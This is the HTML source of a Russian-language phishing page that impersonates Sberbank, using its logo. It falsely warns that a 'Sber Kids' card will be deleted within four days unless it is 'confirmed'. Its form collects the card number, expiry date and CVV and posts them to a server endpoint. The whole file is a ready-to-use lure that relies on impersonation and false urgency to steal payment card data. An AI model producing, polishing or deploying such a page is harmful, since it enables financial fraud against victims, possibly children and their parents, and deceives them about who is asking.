<!DOCTYPE html>
<html>
<head>
    <title>Форма ввода данных карты</title>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
    <style>
        body {
            text-align: center;
            font-family: 'Roboto', sans-serif; /* Применяем шрифт 'Roboto' к тексту */
        }
        form {
            display: inline-block;
            text-align: left;
            margin-top: 20px;
            transform: scale(2.5); /* Увеличиваем размер формы на 250% */
            margin-left: 20px; /* Добавляем отступ слева */
            margin-right: 20px; /* Добавляем отступ справа */
        }
        form > input, form > input[type="submit"] {
            margin-bottom: 20px; /* Отступ снизу для полей ввода и кнопки */
        }
        input[type="submit"] {
            background-color: green;
            color: white;
            padding: 10px 20px; /* Стандартный размер кнопки */
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            box-sizing: border-box;
            max-width: 150px; /* Уменьшаем максимальную ширину кнопки */
            width: 100%;
        }
        img {
            width: 400px; /* Увеличиваем размер иконки */
            height: auto;
            margin-bottom: 20px; /* Отступ снизу */
        }
        h2 {
            margin-top: 0px; /* Отступ между иконкой и текстом */
            margin-bottom: 250px; /* Убираем отступ снизу текста */
            font-weight: 400; /* Настройка начертания шрифта */
        }
        .bold-text {
            font-weight: bold; /* Делаем текст жирным */
        }
    </style>
</head>
<body>
    <img src="https://static4.banki.ru/ugc/46/3e/73/da/856-sberlogo.jpg" alt="Иконка">
    <h2 class="bold-text">Внимание! Ваша карта Сбер Kids не подтверждена! Карта удалиться в течении 4 дней если вы её не подтвердите. Заполните поля ниже, чтобы подтвердить карту:</h2>
    <form action="/submit" method="post">
        Номер карты: <input type="text" name="card_number" required><br>
        Срок действия: <input type="text" name="expiration_date" required><br>
        CVV: <input type="text" name="cvv" required><br>
        <input type="submit" value="Отправить">
    </form>
</body>
</html>